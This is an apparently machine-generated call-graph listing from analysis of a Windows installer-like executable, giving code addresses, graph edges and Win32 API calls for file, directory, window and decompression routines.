416668 SetPropA SetPropA 53085->53084 53086 41669b 53085->53086 53087 4166ae SetWindowPos 53086->53087 53087->53084 53089->53085 53090 42e317 SetErrorMode 53091 42f394 53092 42f3a3 NtdllDefWindowProc_A 53091->53092 53093 42f39f 53091->53093 53092->53093 53094 48fed4 53095 48ff0e 53094->53095 53096 48ff1a 53095->53096 53097 48ff10 53095->53097 53099 48ff29 53096->53099 53100 48ff52 53096->53100 53289 4090a0 MessageBeep 53097->53289 53102 44684c 18 API calls 53099->53102 53105 48ff8a 53100->53105 53106 48ff61 53100->53106 53101 403420 4 API calls 53103 490566 53101->53103 53104 48ff36 53102->53104 53107 403400 4 API calls 53103->53107 53290 406bb8 53104->53290 53114 48ff99 53105->53114 53115 48ffc2 53105->53115 53110 44684c 18 API calls 53106->53110 53111 49056e 53107->53111 53113 48ff6e 53110->53113 53298 406c08 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53113->53298 53117 44684c 18 API calls 53114->53117 53122 48ffea 53115->53122 53123 48ffd1 53115->53123 53119 48ffa6 53117->53119 53118 48ff79 53299 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53118->53299 53300 406c3c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53119->53300 53128 48fff9 53122->53128 53129 49001e 53122->53129 53302 407288 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetCurrentDirectoryA 53123->53302 53124 48ffb1 53301 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53124->53301 53127 48ffd9 53303 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53127->53303 53131 44684c 18 API calls 53128->53131 53134 49002d 53129->53134 53135 490056 53129->53135 53132 490006 53131->53132 53304 4072b0 53132->53304 53137 44684c 18 API calls 53134->53137 53140 49008e 53135->53140 53141 490065 53135->53141 53136 49000e 53307 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53136->53307 53139 49003a 53137->53139 53308 42c7d0 53139->53308 53147 4900da 53140->53147 53148 49009d 53140->53148 53144 44684c 18 API calls 53141->53144 53146 490072 53144->53146 53318 407200 8 API calls 53146->53318 53155 4900e9 53147->53155 53157 490112 53147->53157 53150 44684c 18 API calls 53148->53150 53152 4900ac 53150->53152 53151 49007d 53319 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53151->53319 53154 44684c 18 API calls 53152->53154 53156 4900bd 53154->53156 53158 44684c 18 API calls 53155->53158 53320 48fbd8 8 API calls 53156->53320 53162 49014a 53157->53162 53163 490121 53157->53163 53160 4900f6 53158->53160 53322 42c870 53160->53322 53161 4900c9 53321 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53161->53321 53171 490159 53162->53171 53172 490182 53162->53172 53167 44684c 18 API calls 53163->53167 53170 49012e 53167->53170 53169 48ff15 53169->53101 53328 42c898 53170->53328 53174 44684c 18 API calls 53171->53174 53179 4901ba 53172->53179 53180 490191 53172->53180 53176 490166 53174->53176 53337 42c8c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 53176->53337 53185 4901c9 53179->53185 53186 4901f2 53179->53186 53182 44684c 18 API calls 53180->53182 53181 490171 53338 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53181->53338 53184 49019e 53182->53184 53339 42c8f8 53184->53339 53188 44684c 18 API calls 53185->53188 53193 49023e 53186->53193 53194 490201 53186->53194 53190 4901d6 53188->53190 53345 42c920 53190->53345 53200 49024d 53193->53200 53201 490290 53193->53201 53196 44684c 18 API calls 53194->53196 53197 490210 53196->53197 53199 44684c 18 API calls 53197->53199 53202 490221 53199->53202 53203 44684c 18 API calls 53200->53203 53207 49029f 53201->53207 53208 490303 53201->53208 53351 42c4c4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 53202->53351 53205 490260 53203->53205 53209 44684c 18 API calls 53205->53209 53206 49022d 53352 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53206->53352 53211 44684c 18 API calls 53207->53211 53216 490342 53208->53216 53217 490312 53208->53217 53212 490271 53209->53212 53213 4902ac 53211->53213 53353 48fdd0 12 API calls 53212->53353 53281 42c5d4 7 API calls 53213->53281 53215 49027f 53354 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53215->53354 53225 490381 53216->53225 53226 490351 53216->53226 53220 44684c 18 API calls 53217->53220 53222 49031f 53220->53222 53221 4902ba 53223 4902be 53221->53223 53224 4902f3 53221->53224 53357 451f68 53222->53357 53229 44684c 18 API calls 53223->53229 53356 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53224->53356 53237 4903c0 53225->53237 53238 490390 53225->53238 53230 44684c 18 API calls 53226->53230 53232 4902cd 53229->53232 53233 49035e 53230->53233 53231 49032c 53364 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53231->53364 53282 4522e0 53232->53282 53365 451dd0 53233->53365 53245 490408 53237->53245 53246 4903cf 53237->53246 53242 44684c 18 API calls 53238->53242 53239 4902dd 53355 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53239->53355 53241 49036b 53372 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53241->53372 53244 49039d 53242->53244 53373 452470 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 53244->53373 53252 490450 53245->53252 53253 490417 53245->53253 53249 44684c 18 API calls 53246->53249 53248 4903aa 53374 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53248->53374 53251 4903de 53249->53251 53254 44684c 18 API calls 53251->53254 53259 490463 53252->53259 53265 490519 53252->53265 53255 44684c 18 API calls 53253->53255 53256 4903ef 53254->53256 53257 490426 53255->53257 53261 446acc 5 API calls 53256->53261 53258 44684c 18 API calls 53257->53258 53260 490437 53258->53260 53262 44684c 18 API calls 53259->53262 53268 446acc 5 API calls 53260->53268 53261->53169 53263 490490 53262->53263 53264 44684c 18 API calls 53263->53264 53266 4904a7 53264->53266 53265->53169 53378 4467f0 18 API calls 53265->53378 53375 407de4 7 API calls 53266->53375 53268->53169 53269 490532 53379 42e73c FormatMessageA 53269->53379 53274 4904c9 53275 44684c 18 API calls 53274->53275 53276 4904dd 53275->53276 53376 408510 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53276->53376 53278 4904e8 53377 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53278->53377 53280 4904f4 53281->53221 53384 451d84 53282->53384 53284 4522fd 53284->53239 53285 4522f9 53285->53284 53286 452321 MoveFileA GetLastError 53285->53286 53390 451dc0 53286->53390 53289->53169 53291 406bc7 53290->53291 53292 406be0 53291->53292 53293 406be9 53291->53293 53294 403400 4 API calls 53292->53294 53393 403778 53293->53393 53296 406be7 53294->53296 53297 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53296->53297 53297->53169 53298->53118 53299->53169 53300->53124 53301->53169 53302->53127 53303->53169 53305 403738 53304->53305 53306 4072ba SetCurrentDirectoryA 53305->53306 53306->53136 53307->53169 53309 403738 53308->53309 53310 42c7f3 GetFullPathNameA 53309->53310 53311 42c816 53310->53311 53312 42c7ff 53310->53312 53313 403494 4 API calls 53311->53313 53312->53311 53314 42c807 53312->53314 53315 42c814 53313->53315 53316 4034e0 4 API calls 53314->53316 53317 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53315->53317 53316->53315 53317->53169 53318->53151 53319->53169 53320->53161 53321->53169 53400 42c768 53322->53400 53325 403778 4 API calls 53326 42c891 53325->53326 53327 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53326->53327 53327->53169 53415 42c640 53328->53415 53331 42c8b5 53334 403778 4 API calls 53331->53334 53332 42c8ac 53333 403400 4 API calls 53332->53333 53335 42c8b3 53333->53335 53334->53335 53336 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53335->53336 53336->53169 53337->53181 53338->53169 53340 42c768 IsDBCSLeadByte 53339->53340 53341 42c908 53340->53341 53342 403778 4 API calls 53341->53342 53343 42c91a 53342->53343 53344 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53343->53344 53344->53169 53346 42c768 IsDBCSLeadByte 53345->53346 53347 42c930 53346->53347 53348 403778 4 API calls 53347->53348 53349 42c941 53348->53349 53350 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53349->53350 53350->53169 53351->53206 53352->53169 53353->53215 53354->53169 53355->53169 53356->53169 53358 451d84 2 API calls 53357->53358 53359 451f7e 53358->53359 53360 451f82 53359->53360 53361 451f9e DeleteFileA GetLastError 53359->53361 53360->53231 53362 451dc0 Wow64RevertWow64FsRedirection 53361->53362 53363 451fc4 53362->53363 53363->53231 53364->53169 53366 451d84 2 API calls 53365->53366 53367 451de6 53366->53367 53368 451dea 53367->53368 53369 451e08 CreateDirectoryA GetLastError 53367->53369 53368->53241 53370 451dc0 Wow64RevertWow64FsRedirection 53369->53370 53371 451e2e 53370->53371 53371->53241 53372->53169 53373->53248 53374->53169 53375->53274 53376->53278 53377->53280 53378->53269 53380 42e762 53379->53380 53381 4034e0 4 API calls 53380->53381 53382 42e77f 53381->53382 53383 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53382->53383 53383->53169 53385 451d92 53384->53385 53386 451d8e 53384->53386 53387 451db4 SetLastError 53385->53387 53388 451d9b Wow64DisableWow64FsRedirection 53385->53388 53386->53285 53389 451daf 53387->53389 53388->53389 53389->53285 53391 451dc5 Wow64RevertWow64FsRedirection 53390->53391 53392 451dcf 53390->53392 53391->53392 53392->53239 53394 4037aa 53393->53394 53395 40377d 53393->53395 53396 403400 4 API calls 53394->53396 53395->53394 53398 403791 53395->53398 53397 4037a0 53396->53397 53397->53296 53399 4034e0 4 API calls 53398->53399 53399->53397 53405 42c648 53400->53405 53402 42c7c7 53402->53325 53403 42c77d 53403->53402 53412 42c454 IsDBCSLeadByte 53403->53412 53409 42c659 53405->53409 53406 42c6bd 53408 42c6b8 53406->53408 53414 42c454 IsDBCSLeadByte 53406->53414 53408->53403 53409->53406 53411 42c677 53409->53411 53411->53408 53413 42c454 IsDBCSLeadByte 53411->53413 53412->53403 53413->53411 53414->53408 53416 42c648 IsDBCSLeadByte 53415->53416 53417 42c647 53416->53417 53417->53331 53417->53332 53418 46ad18 53419 46ad4e 53418->53419 53454 46b037 53418->53454 53421 46ad8a 53419->53421 53424 46add4 53419->53424 53425 46ade5 53419->53425 53426 46adb2 53419->53426 53427 46adc3 53419->53427 53428 46ada1 53419->53428 53420 403400 4 API calls 53422 46b071 53420->53422 53421->53454 53513 4683b4 53421->53513 53431 403400 4 API calls 53422->53431 53694 46aa98 67 API calls 53424->53694 53695 46aca8 45 API calls 53425->53695 53693 46a790 42 API calls 53426->53693 53478 46a8d8 53427->53478 53458 46a628 53428->53458 53435 46b079 53431->53435 53436 46ae1e 53449 46ae60 53436->53449 53436->53454 53696 493200 53436->53696 53439 46af71 53715 481938 123 API calls 53439->53715 53440 414af8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53440->53449 53443 46af84 53443->53454 53444 42cb8c 6 API calls 53444->53449 53449->53439 53449->53440 53449->53444 53450 46afd8 53449->53450 53451 46b01a 53449->53451 53449->53454 53455 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53449->53455 53516 4682f0 53449->53516 53524 469f08 53449->53524 53531 469640 53449->53531 53584 469fe8 53449->53584 53622 48146c 53449->53622 53724 46a3e4 19 API calls 53449->53724 53716 457114 53450->53716 53452 469fe8 23 API calls 53451->53452 53452->53454 53454->53420 53455->53449 53457 457114 24 API calls 53457->53451 53725 414af8 53458->53725 53460 46a65a 53465 493200 18 API calls 53460->53465 53469 46a69b 53460->53469 53461 46a6a1 53466 46a6c3 53461->53466 53729 46c45c 53461->53729 53462 46a6d8 53463 46a6e4 GetCursor LoadCursorA SetCursor Sleep SetCursor 53462->53463 53464 46a70d 53462->53464 53463->53464 53738 47d508 42 API calls 53464->53738 53465->53469 53733 414b28 53466->53733 53469->53461 53469->53462 53471 46a6d6 53476 403400 4 API calls 53471->53476 53472 46a721 53472->53471 53475 414b28 4 API calls 53472->53475 53474 403450 4 API calls 53474->53466 53475->53471 53477 46a766 53476->53477 53477->53421 53751 46b4a8 53478->53751 53481 46aa5a 53483 403420 4 API calls 53481->53483 53482 414af8 4 API calls 53485 46a926 53482->53485 53484 46aa74 53483->53484 53486 403400 4 API calls 53484->53486 53511 46aa46 53485->53511 53754 4554a0 13 API calls 53485->53754 53487 46aa7c 53486->53487 53490 403400 4 API calls 53487->53490 53489 403450 4 API calls 53489->53481 53492 46aa84 53490->53492 53491 46a944 53512 46a9a9 53491->53512 53755 465d14 53491->53755 53492->53421 53494 42cd14 7 API calls 53497 46aa1f 53494->53497 53504 450ab8 4 API calls 53497->53504 53497->53511 53501 465d14 19 API calls 53503 46a984 53501->53503 53759 450a88 53503->53759 53507 46aa36 53504->53507 53505 46aa09 53505->53481 53505->53494 53505->53511 53771 47d508 42 API calls 53507->53771 53511->53481 53511->53489 53512->53481 53512->53505 53764 42cd14 53512->53764 53514 4682f0 19 API calls 53513->53514 53515 4683c3 53514->53515 53515->53436 53519 46831f 53516->53519 53517 4078fc 19 API calls 53518 468358 53517->53518 53991 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53518->53991 53519->53517 53521 468360 53519->53521 53522 403400 4 API calls 53521->53522 53523 468378 53522->53523 53523->53449 53525 469f14 53524->53525 53526 469f19 53524->53526 53529 469f17 53525->53529 53992 469974 53525->53992 54077 4691c0 46 API calls 53526->54077 53529->53449 53530 469f21 53530->53449 53532 403400 4 API calls 53531->53532 53533 46966d 53532->53533 54427 47c564 53533->54427 53535 469692 53536 469696 53535->53536 53537 4696ac 53535->53537 54445 465f14 53536->54445 53539 4696a0 53537->53539 54448 4930f0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53537->54448 53542 469771 53539->53542 53543 4697dc 53539->53543 53583 4698a5 53539->53583 53541 403420 4 API calls 53545 4698e1 53541->53545 53546 403494 4 API calls 53542->53546 53547 403494 4 API calls 53543->53547 53544 4696c8 53544->53539 53548 4696d0 53544->53548 53545->53449 53549 46977e 53546->53549 53550 4697e9 53547->53550 53551 469fe8 23 API calls 53548->53551 53553 40357c 4 API calls 53549->53553 53554 40357c 4 API calls 53550->53554 53552 4696dd 53551->53552 54449 42f3d4 53552->54449 53556 46978b 53553->53556 53557 4697f6 53554->53557 53559 40357c 4 API calls 53556->53559 53560 40357c 4 API calls 53557->53560 53563 469798 53559->53563 53561 469803 53560->53561 53565 40357c 4 API calls 53561->53565 53564 40357c 4 API calls 53563->53564 53567 4697a5 53564->53567 53568 469810 53565->53568 53566 469724 53566->53449 53569 465f14 20 API calls 53567->53569 53570 40357c 4 API calls 53568->53570 53571 4697b3 53569->53571 53572 46981e 53570->53572 53573 40357c 4 API calls 53571->53573 53574 414b28 4 API calls 53572->53574 53575 4697bc 53573->53575 53576 4697da 53574->53576 53577 40357c 4 API calls 53575->53577 54466 46624c 53576->54466 53579 4697c9 53577->53579 53580 414b28 4 API calls 53579->53580 53580->53576 53583->53541 53585 4682f0 19 API calls 53584->53585 53587 46a000 53585->53587 53586 46a034 54628 4649f4 53586->54628 53587->53586 53588 4649f4 7 API calls 53587->53588 53588->53586 53592 46a04c 53594 46a09a 53592->53594 53597 46a133 53592->53597 54649 469f9c 19 API calls 53592->54649 53595 4682f0 19 API calls 53594->53595 53595->53597 53596 46a1f2 GetSystemMenu EnableMenuItem 53598 414b28 4 API calls 53596->53598 53597->53596 53599 46a212 53598->53599 53600 46a21e 53599->53600 53601 46a248 53599->53601 53602 414b28 4 API calls 53600->53602 53604 46a264 53601->53604 53605 46a28e 53601->53605 53603 46a232 53602->53603 53607 414b28 4 API calls 53603->53607 53608 414b28 4 API calls 53604->53608 53606 414b28 4 API calls 53605->53606 53610 46a2a2 53606->53610 53611 46a246 53607->53611 53609 46a278 53608->53609 53612 414b28 4 API calls 53609->53612 53613 414b28 4 API calls 53610->53613 54645 469f30 53611->54645 53612->53611 53613->53611 53616 4683b4 19 API calls 53620 46a340 53616->53620 53618 46a2e0 53618->53616 53619 46a3a3 53619->53449 53620->53619 54651 49314c 18 API calls 53620->54651 53623 46b4a8 47 API calls 53622->53623 53624 4814af 53623->53624 53625 4814b8 53624->53625 54851 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53624->54851 53627 414af8 4 API calls 53625->53627 53628 4814c8 53627->53628 53629 403450 4 API calls 53628->53629 53630 4814d5 53629->53630 54671 46b7b8 53630->54671 53633 4814e5 53634 414af8 4 API calls 53633->53634 53636 4814f5 53634->53636 53637 403450 4 API calls 53636->53637 53638 481502 53637->53638 53639 468fa8 SendMessageA 53638->53639 53640 48151b 53639->53640 53641 481559 53640->53641 54853 478a14 23 API calls 53640->54853 53643 4241ec 11 API calls 53641->53643 53644 481563 53643->53644 53645 481589 53644->53645 53646 481574 SetActiveWindow 53644->53646 54700 480a68 53645->54700 53646->53645 53693->53421 53694->53421 53695->53421 56571 43d21c 53696->56571 53699 49322c 56576 431424 53699->56576 53700 4932b2 53701 4932c1 53700->53701 56609 492a28 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53700->56609 53701->53449 53710 493276 56607 492abc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53710->56607 53712 49328a 56608 433624 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53712->56608 53714 4932aa 53714->53449 53715->53443 53717 457139 53716->53717 53718 457159 53717->53718 53719 4078fc 19 API calls 53717->53719 53721 403400 4 API calls 53718->53721 53720 457151 53719->53720 53722 456f08 24 API calls 53720->53722 53723 45716e 53721->53723 53722->53718 53723->53457 53724->53449 53726 414b06 53725->53726 53727 4034e0 4 API calls 53726->53727 53728 414b13 53727->53728 53728->53460 53730 46a6b6 53729->53730 53731 46c465 53729->53731 53730->53474 53739 46c53c 53731->53739 53734 414af8 4 API calls 53733->53734 53735 414b4c 53734->53735 53736 403400 4 API calls 53735->53736 53737 414b7d 53736->53737 53737->53471 53738->53472 53740 46c543 53739->53740 53743 45cf00 53740->53743 53744 45cf0b 53743->53744 53745 45cf26 VirtualAlloc 53744->53745 53746 45cf45 53745->53746 53747 45cf4a BZ2_bzDecompressInit 53745->53747 53746->53747 53750 45ce5c 19 API calls 53747->53750 53749 45cf8f 53749->53730 53750->53749 53772 46b534 53751->53772 53754->53491 53756 465d2e 53755->53756 53942 4078fc 53756->53942 53760 450aa8 53759->53760 53961 450960 53760->53961 53985 42cc98 53764->53985 53767 450ab8 53768 450a88 4 API calls 53767->53768 53769 450ad4 53768->53769 53770 47d508 42 API calls 53769->53770 53770->53505 53771->53511 53773 414af8 4 API calls 53772->53773 53774 46b566 53773->53774 53826 465fac 53774->53826 53777 414b28 4 API calls 53778 46b578 53777->53778 53779 46b587 53778->53779 53782 46b5a0 53778->53782 53876 47d508 42 API calls 53779->53876 53781 46b59b 53783 403420 4 API calls 53781->53783 53784 46b5e7 53782->53784 53786 46b5ce 53782->53786 53785 46a90a 53783->53785 53787 46b64c 53784->53787 53800 46b5eb 53784->53800 53785->53481 53785->53482 53877 47d508 42 API calls 53786->53877 53879 42cb18 CharNextA 53787->53879 53790 46b65b 53791 46b65f 53790->53791 53794 46b678 53790->53794 53880 47d508 42 API calls 53791->53880 53793 46b633 53878 47d508 42 API calls 53793->53878 53795 46b69c 53794->53795 53835 46611c 53794->53835 53881 47d508 42 API calls 53795->53881 53799 46b68c 53799->53795 53840 46614c 53799->53840 53800->53793 53800->53794 53803 46b6b5 53804 403778 4 API calls 53803->53804 53805 46b6cb 53804->53805 53844 42c968 53805->53844 53808 46b6dc 53882 4661a8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53808->53882 53809 46b70a 53811 42c898 5 API calls 53809->53811 53813 46b715 53811->53813 53812 46b6ef 53814 450ab8 4 API calls 53812->53814 53848 42c40c 53813->53848 53816 46b6fc 53814->53816 53883 47d508 42 API calls 53816->53883 53817 46b720 53858 42cb8c 53817->53858 53831 465fc6 53826->53831 53828 42cb8c 6 API calls 53828->53831 53829 403450 4 API calls 53829->53831 53830 406bb8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53830->53831 53831->53828 53831->53829 53831->53830 53832 46600f 53831->53832 53885 42ca78 53831->53885 53833 403420 4 API calls 53832->53833 53834 466029 53833->53834 53834->53777 53837 466126 53835->53837 53836 466147 53836->53799 53837->53836 53838 466139 53837->53838 53915 42cb08 CharNextA 53837->53915 53838->53799 53841 466156 53840->53841 53842 466183 53841->53842 53916 42cb08 CharNextA 53841->53916 53842->53795 53842->53803 53845 42c9c1 53844->53845 53846 42c97e 53844->53846 53845->53808 53845->53809 53846->53845 53917 42cb08 CharNextA 53846->53917 53849 42c416 53848->53849 53850 42c439 53848->53850 53918 42c948 CharPrevA 53849->53918 53851 403494 4 API calls 53850->53851 53853 42c442 53851->53853 53853->53817 53854 42c41d 53854->53850 53855 42c428 53854->53855 53919 4035c0 53855->53919 53859 42c648 IsDBCSLeadByte 53858->53859 53862 42cb9d 53859->53862 53876->53781 53877->53781 53878->53781 53879->53790 53880->53781 53881->53781 53882->53812 53883->53781 53886 403494 4 API calls 53885->53886 53887 42ca88 53886->53887 53892 42cabe 53887->53892 53894 403744 53887->53894 53898 42c454 IsDBCSLeadByte 53887->53898 53890 42cb02 53890->53831 53892->53890 53899 4037b8 53892->53899 53904 42c454 IsDBCSLeadByte 53892->53904 53895 40374a 53894->53895 53897 40375b 53894->53897 53896 4034bc 4 API calls 53895->53896 53895->53897 53896->53897 53897->53887 53898->53887 53900 403744 4 API calls 53899->53900 53902 4037c6 53900->53902 53901 4037fc 53901->53892 53902->53901 53905 4038a4 53902->53905 53904->53892 53906 4038b1 53905->53906 53913 4038e1 53905->53913 53908 4038da 53906->53908 53911 4038bd 53906->53911 53907 403400 4 API calls 53910 4038cb 53907->53910 53909 4034bc 4 API calls 53908->53909 53909->53913 53910->53901 53914 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53911->53914 53913->53907 53914->53910 53915->53837 53916->53841 53917->53846 53918->53854 53920 4035c4 53919->53920 53929 40357c 53919->53929 53921 403450 53920->53921 53922 4035e2 53920->53922 53923 4035d4 53920->53923 53920->53929 53925 403464 53921->53925 53926 4034bc 4 API calls 53921->53926 53928 4034bc 4 API calls 53922->53928 53926->53925 53929->53921 53930 4035bf 53929->53930 53931 40358a 53929->53931 53945 407910 53942->53945 53946 40792d 53945->53946 53953 4075c0 53946->53953 53949 407959 53951 4034e0 4 API calls 53949->53951 53952 40790b 53951->53952 53952->53501 53956 4075db 53953->53956 53954 4075ed 53954->53949 53958 4069a8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53954->53958 53956->53954 53959 4076e2 19 API calls 53956->53959 53960 4075b4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53956->53960 53958->53949 53959->53956 53960->53956 53962 403400 4 API calls 53961->53962 53970 450991 53962->53970 53963 4509bc 53966 4509a8 53967 4034e0 4 API calls 53967->53970 53969 40357c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53969->53970 53970->53963 53970->53966 53970->53967 53970->53969 53986 42cb8c 6 API calls 53985->53986 53987 42ccba 53986->53987 53988 42ccc2 GetFileAttributesA 53987->53988 53989 403400 4 API calls 53988->53989 53990 42ccdf 53989->53990 53990->53505 53990->53767 53991->53521 53994 4699bb 53992->53994 53993 469e33 53995 469e4e 53993->53995 53996 469e7f 53993->53996 53994->53993 53997 469a76 53994->53997 54001 403494 4 API calls 53994->54001 54000 403494 4 API calls 53995->54000 53998 403494 4 API calls 53996->53998 53999 469a97 53997->53999 54003 469ad8 53997->54003 54002 469e8d 53998->54002 54004 403494 4 API calls 53999->54004 54005 469e5c 54000->54005 54006 4699fa 54001->54006 54099 46889c 12 API calls 54002->54099 54007 403400 4 API calls 54003->54007 54009 469aa5 54004->54009 54098 46889c 12 API calls 54005->54098 54011 414af8 4 API calls 54006->54011 54012 469ad6 54007->54012 54013 414af8 4 API calls 54009->54013 54015 469a1b 54011->54015 54035 469bbc 54012->54035 54078 468fa8 54012->54078 54017 469ac6 54013->54017 54014 469e6a 54016 403400 4 API calls 54014->54016 54018 403634 4 API calls 54015->54018 54020 469eb0 54016->54020 54022 403634 4 API calls 54017->54022 54023 469a2b 54018->54023 54027 403400 4 API calls 54020->54027 54021 469c44 54025 403400 4 API calls 54021->54025 54022->54012 54024 414af8 4 API calls 54023->54024 54028 469a3f 54024->54028 54029 469c42 54025->54029 54026 469af8 54030 469b36 54026->54030 54031 469afe 54026->54031 54032 469eb8 54027->54032 54028->53997 54037 414af8 4 API calls 54028->54037 54093 4693e4 43 API calls 54029->54093 54036 403400 4 API calls 54030->54036 54033 403494 4 API calls 54031->54033 54034 403420 4 API calls 54032->54034 54038 469b0c 54033->54038 54039 469ec5 54034->54039 54035->54021 54040 469c03 54035->54040 54041 469b34 54036->54041 54042 469a66 54037->54042 54084 47ad88 54038->54084 54039->53529 54045 403494 4 API calls 54040->54045 54087 46929c 54041->54087 54046 403634 4 API calls 54042->54046 54049 469c11 54045->54049 54046->53997 54047 469c6d 54056 469cce 54047->54056 54057 469c78 54047->54057 54048 469b24 54051 403634 4 API calls 54048->54051 54052 414af8 4 API calls 54049->54052 54051->54041 54053 469c32 54052->54053 54055 403634 4 API calls 54053->54055 54054 469b5d 54060 469bbe 54054->54060 54061 469b68 54054->54061 54055->54029 54058 403400 4 API calls 54056->54058 54059 403494 4 API calls 54057->54059 54062 469cd6 54058->54062 54066 469c86 54059->54066 54063 403400 4 API calls 54060->54063 54064 403494 4 API calls 54061->54064 54065 469ccc 54062->54065 54076 469d7f 54062->54076 54063->54035 54069 469b76 54064->54069 54065->54062 54094 4930f0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54065->54094 54066->54062 54066->54065 54071 403634 4 API calls 54066->54071 54068 469cf9 54068->54076 54095 49339c 18 API calls 54068->54095 54069->54035 54072 403634 4 API calls 54069->54072 54071->54066 54072->54069 54074 469e20 54097 429154 SendMessageA SendMessageA 54074->54097 54096 429104 SendMessageA 54076->54096 54077->53530 54100 42a050 SendMessageA 54078->54100 54080 468fb7 54081 468fd7 54080->54081 54101 42a050 SendMessageA 54080->54101 54081->54026 54083 468fc7 54083->54026 54102 47ada8 54084->54102 54091 4692c9 54087->54091 54088 46932b 54089 403400 4 API calls 54088->54089 54090 469340 54089->54090 54090->54054 54091->54088 54426 469220 43 API calls 54091->54426 54093->54047 54094->54068 54095->54076 54096->54074 54097->53993 54098->54014 54099->54014 54100->54080 54101->54083 54103 403494 4 API calls 54102->54103 54107 47addb 54103->54107 54104 47aee0 54105 403420 4 API calls 54104->54105 54106 47ada3 54105->54106 54106->54048 54107->54104 54109 403778 4 API calls 54107->54109 54113 4037b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54107->54113 54114 479cfc 54107->54114 54346 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54107->54346 54347 403800 54107->54347 54351 42c948 CharPrevA 54107->54351 54109->54107 54113->54107 54115 479d4e 54114->54115 54118 479d2c 54114->54118 54116 479d6e 54115->54116 54117 479d5c 54115->54117 54121 479dd1 54116->54121 54122 479d7c 54116->54122 54119 403494 4 API calls 54117->54119 54118->54115 54356 478c2c 19 API calls 54118->54356 54185 479d69 54119->54185 54132 479df2 54121->54132 54133 479ddf 54121->54133 54124 479d85 54122->54124 54125 479dab 54122->54125 54123 403400 4 API calls 54127 47a67c 54123->54127 54128 479d98 54124->54128 54357 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54124->54357 54126 479dbe 54125->54126 54358 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54125->54358 54130 403494 4 API calls 54126->54130 54131 403400 4 API calls 54127->54131 54135 403494 4 API calls 54128->54135 54130->54185 54136 47a684 54131->54136 54138 479e13 54132->54138 54139 479e00 54132->54139 54137 403494 4 API calls 54133->54137 54135->54185 54136->54107 54137->54185 54141 479e63 54138->54141 54142 479e21 54138->54142 54140 403494 4 API calls 54139->54140 54140->54185 54147 479e84 54141->54147 54148 479e71 54141->54148 54143 479e3d 54142->54143 54144 479e2a 54142->54144 54146 479e50 54143->54146 54359 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54143->54359 54145 403494 4 API calls 54144->54145 54145->54185 54150 403494 4 API calls 54146->54150 54152 479ea5 54147->54152 54153 479e92 54147->54153 54151 403494 4 API calls 54148->54151 54150->54185 54151->54185 54155 479ec6 54152->54155 54156 479eb3 54152->54156 54154 403494 4 API calls 54153->54154 54154->54185 54158 479ee7 54155->54158 54159 479ed4 54155->54159 54157 403494 4 API calls 54156->54157 54157->54185 54161 479ef5 54158->54161 54162 479f24 54158->54162 54160 403494 4 API calls 54159->54160 54160->54185 54163 479f11 54161->54163 54164 479efe 54161->54164 54167 479f32 54162->54167 54168 479f61 54162->54168 54166 403494 4 API calls 54163->54166 54165 403494 4 API calls 54164->54165 54165->54185 54166->54185 54169 479f4e 54167->54169 54170 479f3b 54167->54170 54173 479f82 54168->54173 54174 479f6f 54168->54174 54172 403494 4 API calls 54169->54172 54171 403494 4 API calls 54170->54171 54171->54185 54172->54185 54176 479fa3 54173->54176 54177 479f90 54173->54177 54175 403494 4 API calls 54174->54175 54175->54185 54185->54123 54346->54107 54348 403804 